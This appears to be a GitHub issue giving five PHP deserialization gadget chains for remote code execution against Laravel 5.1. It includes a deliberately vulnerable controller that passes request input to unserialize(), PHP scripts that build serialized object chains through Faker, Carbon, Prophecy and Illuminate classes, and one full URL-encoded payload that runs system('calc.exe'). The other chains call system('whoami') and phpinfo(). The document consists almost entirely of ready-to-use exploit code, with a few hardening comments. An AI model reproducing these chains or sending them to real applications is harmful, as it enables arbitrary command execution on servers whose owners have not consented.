
Laravel5.1 Unserialize RCE #1

@beicheng-maker

Description

@beicheng-maker

Laravel 5.1 POP Chains 1-5

# Scaffold a Laravel 5.1.x application; the controller and route below are added to it.
composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"
Add a controller `UsersController` at app/Http/Controllers/UsersController.php:

<?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
class UsersController extends Controller
{

    /**
     * Create a new user.
     *
     * Deliberately unsafe harness for the payloads further down: the raw `cmd`
     * request input goes straight to unserialize(), so the request decides which
     * autoloadable classes get instantiated. A hardened endpoint would accept
     * JSON instead, or at minimum call
     * unserialize($payload, ['allowed_classes' => false]). Such payloads are
     * recognisable by the `O:<len>:"<class>"` prefix visible in the URL-encoded
     * `cmd` values below.
     *
     * @param  Request  $request
     * @return Response
     */
    public function store(Request $request)
    {  
        echo "Please post cmd to unserialize";

        $payload=$request->input("cmd");

        unserialize($payload); // deserialization sink that every chain on this page targets
        //
    }
}
?>

routes/web.php
Route::post('/test', [\App\Http\Controllers\UsersController::class, 'store']);

<?php
use Illuminate\Support\Facades\Route;
/*
|--------------------------------------------------------------------------

| Web Routes

|--------------------------------------------------------------------------

|

| Here is where you can register web routes for your application. These

| routes are loaded by the RouteServiceProvider within a group which

| contains the "web" middleware group. Now create something great!

|

*/

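// Expose the harness: POST /test dispatches to UsersController::store.
// (The original line used `==` where PHP's scope operator `::` is required.)
Route::post('/test', [\App\Http\Controllers\UsersController::class, 'store']);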

0x01 RCE 1

<?php
namespace Faker;
class ChanceGenerator{
    // Serialization stub: the FQCN, property names and visibility match the vendor
    // Faker\ChanceGenerator, so the string serialize() produces hydrates the real
    // class on the target. Only the two values below are chosen here; the vendor
    // code that later reads them is not shown on this page.
    private $weight;
    protected $default;
    public function __construct(){
	    $this->weight=0;
	    $this->default='calc.exe';
    }
}
namespace Faker;
class ValidGenerator{
    // Serialization stub for the vendor Faker\ValidGenerator: same FQCN and
    // protected property names, values chosen here. $generator nests the
    // ChanceGenerator stub; how the vendor class uses these three fields is not
    // shown on this page.
    protected $generator;
    protected $validator;
    protected $maxRetries;
    public function __construct(){
	    $this->generator=new ChanceGenerator();
	    $this->validator='system';
	    $this->maxRetries=1;
    }
}

namespace Illuminate\Broadcasting;
use Faker\ValidGenerator;
class PendingBroadcast{
	// Outermost object of the chain: a stub for the vendor
	// Illuminate\Broadcasting\PendingBroadcast whose $events slot carries the
	// ValidGenerator stub. This is the object serialized below.
	protected $events;
	public function __construct(){
		$this->events=new ValidGenerator();
	}
}
// Print the URL-encoded serialized chain; this string is what gets posted as `cmd`.
$chain = serialize(new PendingBroadcast);
echo urlencode($chain);
?>

cmd=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A20%3A%22Faker%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%00%2A%00generator%22%3BO%3A21%3A%22Faker%5CChanceGenerator%22%3A2%3A%7Bs%3A29%3A%22%00Faker%5CChanceGenerator%00weight%22%3Bi%3A0%3Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A8%3A%22calc.exe%22%3B%7Ds%3A12%3A%22%00%2A%00validator%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00maxRetries%22%3Bi%3A1%3B%7D%7D

0x02 RCE 2

<?php
namespace Illuminate\Validation;
class Validator{
	// Stub for the vendor Illuminate\Validation\Validator: only $extensions is
	// populated, with a single entry under the empty-string key.
	public $extensions = [];
	public function __construct(){
		$this->extensions['']='call_user_func';
	}
}


namespace Illuminate\Routing;
use Illuminate\Validation\Validator;
class PendingResourceRegistration{
	// Stub for the vendor Illuminate\Routing\PendingResourceRegistration with the
	// same FQCN and protected property names; $registrar nests the Validator stub.
	// No serialize() call follows this class in the listing, so the emitted
	// payload for this chain is not shown on this page.
	protected $registrar;
	protected $name;
	protected $controller;
	protected $options;
	public function __construct(){
		$this->name='call_user_func';
		$this->controller='system';
		$this->options='whoami';
		$this->registrar=new Validator;
		}
}

0x03 RCE 3

<?php

namespace Illuminate\Auth;
class RequestGuard{
	// Stub for the vendor Illuminate\Auth\RequestGuard: same FQCN and protected
	// property names, string values chosen here. The vendor method that reads
	// them is not shown on this page.
	protected $provider;
	protected $callback;
	protected $request;
	public function __construct(){
		$this->callback = 'call_user_func';
		$this->request = 'system';
		$this->provider = 'calc.exe';
	}
}


namespace Illuminate\View;
use Illuminate\Auth\RequestGuard;
class InvokableComponentVariable{
	// Stub for the vendor Illuminate\View\InvokableComponentVariable; $callable is
	// the array-callable form [object, 'user'] built on the RequestGuard stub.
	protected $callable=[];
	public function __construct(){
		$this->callable=[new RequestGuard,'user'];
	}
}
namespace SebastianBergmann\RecursionContext;
use Illuminate\View\InvokableComponentVariable;
final class Context{
	// Outermost object of the chain: a stub for the vendor
	// SebastianBergmann\RecursionContext\Context whose private $arrays slot
	// carries the InvokableComponentVariable stub instead of an array. This is
	// the object serialized below.
	private $arrays = [];
	public function __construct(){
		$this->arrays=new InvokableComponentVariable;
	}
}
// Print the URL-encoded serialized chain; this string is what gets posted as `cmd`.
$chain = serialize(new Context);
echo urlencode($chain);
?>

image

0x04 RCE 4

<?php
namespace Faker;
class DefaultGenerator{
	// Stub for the vendor Faker\DefaultGenerator; its single public $default is
	// filled in by the CarbonPeriod stub, which nests two of these.
	public $default;

}
namespace Carbon;
// Empty stand-in: only the Carbon\Carbon class name is carried, in the $current slot of the CarbonPeriod stub.
class Carbon{}

namespace Faker;
class Generator{
	// Stub for the vendor Faker\Generator; $formatters gets one entry keyed
	// 'huahua', the same string the CarbonPeriod stub places in its nested
	// DefaultGenerator's $default.
	protected $formatters = [];
	public function __construct(){
		$this->formatters['huahua']='system';
	}
}

namespace Carbon;
use Carbon\Carbon;
use Faker\DefaultGenerator;
use Faker\Generator;
class CarbonPeriod{
	// Stub for the vendor Carbon\CarbonPeriod: same FQCN and protected property
	// names. $dateClass is a two-level DefaultGenerator nest ending in the string
	// 'huahua', $filters holds one [Generator, 'format'] pair wrapped in an extra
	// array level, $key an array with one string. Which vendor method consumes
	// these after unserialize() is not shown on this page.
	protected $current;
	protected $dateClass;
	protected $filters = [];
	protected $key;
	public function __construct(){
		$this->dateClass=new DefaultGenerator;
		$this->dateClass->default=new DefaultGenerator;
		$this->dateClass->default->default='huahua';
		$this->current=new Carbon;
		$this->filters[][]=[new Generator,'format']; // `[][]=` appends into a fresh inner array: $filters === [[[obj, 'format']]]
		$this->key=array("calc.exe");
	}
}


namespace Illuminate\View;
use Carbon\CarbonPeriod;
class InvokableComponentVariable{
	// Stub for the vendor Illuminate\View\InvokableComponentVariable; $callable is
	// the array-callable form [object, 'valid'] built on the CarbonPeriod stub.
	protected $callable=[];
	public function __construct(){
		$this->callable=[new CarbonPeriod,'valid'];
	}
}
namespace SebastianBergmann\RecursionContext;
use Illuminate\View\InvokableComponentVariable;
final class Context{
	// Outermost object of the chain: a stub for the vendor
	// SebastianBergmann\RecursionContext\Context whose private $arrays slot
	// carries the InvokableComponentVariable stub instead of an array. This is
	// the object serialized below.
	private $arrays = [];
	public function __construct(){
		$this->arrays=new InvokableComponentVariable;
	}
}
// Print the URL-encoded serialized chain; this string is what gets posted as `cmd`.
$chain = serialize(new Context);
echo urlencode($chain);
?>

image

0x05 RCE 5

<?php
namespace Faker;
class DefaultGenerator{
	// Stub for the vendor Faker\DefaultGenerator; its single public $default is
	// filled in by the ClassCreator and CarbonPeriod stubs that nest it.
	public $default;

}
namespace Prophecy\Doubler\Generator;
use Faker\DefaultGenerator;
class ClassCreator{
	// Stub for the vendor Prophecy\Doubler\Generator\ClassCreator: the private
	// $generator is a DefaultGenerator stub whose $default holds a string of PHP
	// source. The vendor code that receives it is not shown on this page.
	private $generator;
	public function __construct(){
		$this->generator=new DefaultGenerator;
		$this->generator->default='phpinfo();';

	}

}

namespace Carbon;
// Empty stand-in: only the Carbon\Carbon class name is carried, in the $current slot of the CarbonPeriod stub.
class Carbon{}

namespace Prophecy\Doubler\Generator\Node;
// Empty stand-in: only the Prophecy\Doubler\Generator\Node\ClassNode class name is carried, in the $key slot of the CarbonPeriod stub.
class ClassNode{}

namespace Carbon;
use Faker\DefaultGenerator;
use Prophecy\Doubler\Generator\ClassCreator;
use Prophecy\Doubler\Generator\Node\ClassNode;
class CarbonPeriod{
	// Stub for the vendor Carbon\CarbonPeriod: same FQCN and protected property
	// names. $dateClass is a two-level DefaultGenerator nest ending in the string
	// 'huahua', $filters holds one [ClassCreator, 'create'] pair wrapped in an
	// extra array level, $key a ClassNode stub. Which vendor method consumes these
	// after unserialize() is not shown on this page.
	protected $current;
	protected $dateClass;
	protected $filters = [];
	protected $key;
	public function __construct(){
		$this->dateClass=new DefaultGenerator;
		$this->dateClass->default=new DefaultGenerator;
		$this->dateClass->default->default='huahua';
		$this->current=new Carbon;
		$this->filters[][]=[new ClassCreator,'create']; // `[][]=` appends into a fresh inner array: $filters === [[[obj, 'create']]]
		$this->key=new ClassNode;
	}
}


namespace Illuminate\View;
use Carbon\CarbonPeriod;
class InvokableComponentVariable{
	// Stub for the vendor Illuminate\View\InvokableComponentVariable; $callable is
	// the array-callable form [object, 'valid'] built on the CarbonPeriod stub.
	protected $callable=[];
	public function __construct(){
		$this->callable=[new CarbonPeriod,'valid'];
	}
}
namespace SebastianBergmann\RecursionContext;
use Illuminate\View\InvokableComponentVariable;
final class Context{
	// Outermost object of the chain: a stub for the vendor
	// SebastianBergmann\RecursionContext\Context whose private $arrays slot
	// carries the InvokableComponentVariable stub instead of an array. This is
	// the object serialized below.
	private $arrays = [];
	public function __construct(){
		$this->arrays=new InvokableComponentVariable;
	}
}
// Print the URL-encoded serialized chain; this string is what gets posted as `cmd`.
$chain = serialize(new Context);
echo urlencode($chain);
?>

